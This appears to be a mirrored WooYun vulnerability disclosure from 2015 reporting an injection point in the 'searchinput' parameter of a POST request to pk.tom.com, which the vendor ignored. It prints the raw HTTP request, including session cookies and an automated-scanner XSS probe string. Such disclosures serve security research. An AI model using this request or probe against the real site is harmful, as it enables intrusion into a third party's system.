乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经主动忽略漏洞,细节向公众公开
POST /web/partyview.do?cmd=searchlist&pageNumber=1 HTTP/1.1Content-Length: 152Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://pk.tom.com:80/Cookie: JSESSIONID=abcmtvxBcNZAjaN3wOp-u; Hm_lvt_e68f6e0719b540422cb1660628b45778=1442297746,1442297783,1442297818,1442297964; Hm_lpvt_e68f6e0719b540422cb1660628b45778=1442297964; HMACCOUNT=4EB7B87E9634844B; _pk_ref.5.d0c4=%5B%22%22%2C%22%22%2C1442297524%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.5.d0c4=2cd56feaf9e1ab95.1442297524.1.1442297819.1442297524.; _pk_ses.5.d0c4=*; tom_test=Mlfvjie4o!1!1!1442297511!1442297511!1!0!http://pk.tom.com/web/register.jsp!; nickname=; partyname=%E7%A5%9E%E5%9F%9F%E9%97%A8%E5%8D%AB; partyid=39Host: pk.tom.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*searchinput=%c7%eb%ca%e4%c8%eb%b9%ab%bb%e1%c3%fb%b3%c6%b9%d8%bc%fc%d7%d6*&sewd=
searchinput是注入点
危害等级:无影响厂商忽略
忽略时间:2015-09-21 23:26
漏洞Rank:4 (WooYun评价)
暂无